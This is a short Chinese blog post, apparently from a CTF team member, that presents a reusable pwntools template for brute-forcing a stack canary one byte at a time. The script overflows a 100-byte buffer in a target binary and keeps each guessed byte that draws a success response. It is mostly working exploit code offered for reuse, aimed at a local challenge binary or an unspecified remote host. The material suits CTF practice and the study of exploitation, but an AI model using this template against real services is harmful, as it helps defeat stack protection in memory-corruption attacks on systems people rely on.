ReStr0
Venom战队队员 Chamd5安全团队
ReStr0-Blog

Canary爆破

通用模板

#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context(arch='i386', os='linux')
local = 1
elf = ELF('./bin1')

if local:
    p = process('./bin1')
    #libc = elf.libc

else:
    p = remote('',)
    libc = ELF('./')
p.recvuntil('welcome\n')
canary = '\x00'
for k in range(3):
    for i in range(256):
        print "正在爆破Canary的第" + str(k+1)+"位" 
        print "当前的字符为"+ chr(i)
        payload='a'*100 + canary + chr(i)
        print "当前payload为:",payload
        p.send('a'*100 + canary + chr(i))
        data=p.recvuntil("welcome\n")
        print data
        if "sucess" in data:
            canary += chr(i)
            print "Canary is: " + canary
            break

发表评论

textsms
account_circle
email

ReStr0-Blog

Canary爆破
通用模板 #coding=utf8 from pwn import * context.log_level = 'debug' context.terminal = ['gnome-terminal','-x','bash','-c'] context(arch='i386', os='linux') local = 1 elf =…
扫描二维码继续阅读
2021-08-15